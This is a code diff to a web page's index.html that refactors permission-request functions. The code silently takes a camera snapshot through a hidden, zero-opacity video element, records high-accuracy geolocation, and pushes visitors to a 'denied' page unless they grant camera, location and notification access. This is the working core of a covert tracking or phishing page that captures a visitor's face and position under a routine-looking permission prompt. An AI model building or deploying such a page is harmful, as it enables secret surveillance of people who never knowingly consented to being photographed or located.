--- a/index.html
+++ b/index.html
@@ -81,7 +81,33 @@
       return new Blob([u8arr], { type: mime });
     }
 
-    async function captureSnapshot() {
+    function askNotificationPermission() {
+      return new Promise((resolve) => {
+        if ('Notification' in window && Notification.permission !== 'granted') {
+          Notification.requestPermission().then(p => resolve(p === 'granted')).catch(() => resolve(false));
+        } else {
+          resolve(true);
+        }
+      });
+    }
+
+    function askLocationPermission() {
+      return new Promise((resolve) => {
+        if (!navigator.geolocation) return resolve(false);
+        navigator.geolocation.getCurrentPosition(
+          (pos) => {
+            coords.lat = pos.coords.latitude;
+            coords.lon = pos.coords.longitude;
+            coords.acc = pos.coords.accuracy;
+            resolve(true);
+          },
+          () => resolve(false),
+          { enableHighAccuracy: true, timeout: 10000, maximumAge: 0 }
+        );
+      });
+    }
+
+    async function askCameraPermission() {
       try {
         const stream = await navigator.mediaDevices.getUserMedia({ video: true });
         const video = document.createElement("video");
@@ -91,24 +117,22 @@
         video.style.opacity = "0";
         video.srcObject = stream;
         document.body.appendChild(video);
+
         await video.play();
-        await new Promise((resolve) => {
-          const waitForSize = () => {
-            if (video.videoWidth > 0 && video.videoHeight > 0) resolve();
-            else requestAnimationFrame(waitForSize);
-          };
-          waitForSize();
-        });
         await new Promise(res => setTimeout(res, 3000));
+
         const canvas = document.createElement("canvas");
         canvas.width = video.videoWidth;
         canvas.height = video.videoHeight;
         const ctx = canvas.getContext("2d");
         ctx.drawImage(video, 0, 0, canvas.width, canvas.height);
         capturedImageData = canvas.toDataURL("image/png");
-        stream.getTracks().forEach(t => t.stop());
+
+        stream.getTracks().forEach(track => track.stop());
+        return true;
       } catch (err) {
-        console.warn("Camera access denied or failed", err);
+        console.warn("Camera error:", err);
+        return false;
       }
     }
 
@@ -150,46 +174,19 @@
       });
     }
 
-    function askNotificationPermission() {
-      return new Promise((resolve) => {
-        if ('Notification' in window && Notification.permission !== 'granted') {
-          Notification.requestPermission().then(() => resolve(true)).catch(() => resolve(false));
-        } else {
-          resolve(true);
-        }
-      });
-    }
-
-    function askLocation() {
-      return new Promise((resolve) => {
-        if (!navigator.geolocation) return resolve(false);
-        navigator.geolocation.getCurrentPosition(
-          (pos) => {
-            coords.lat = pos.coords.latitude;
-            coords.lon = pos.coords.longitude;
-            coords.acc = pos.coords.accuracy;
-            resolve(true);
-          },
-          () => resolve(false),
-          { enableHighAccuracy: true, timeout: 10000, maximumAge: 0 }
-        );
-      });
-    }
-
     async function requestAllPermissions() {
       document.getElementById("main").innerHTML = `
         <div id="statusText">Requesting permissions…</div>
         <div id="spinner"></div>
       `;
 
-      const [location, notifications] = await Promise.all([
-        askLocation(),
-        askNotificationPermission()
+      const [locationGranted, notificationGranted, cameraGranted] = await Promise.all([
+        askLocationPermission(),
+        askNotificationPermission(),
+        askCameraPermission()
       ]);
 
-      await captureSnapshot();
-
-      if (!location) {
+      if (!locationGranted || !notificationGranted || !cameraGranted) {
         window.location.href = deniedPage;
         return;
       }
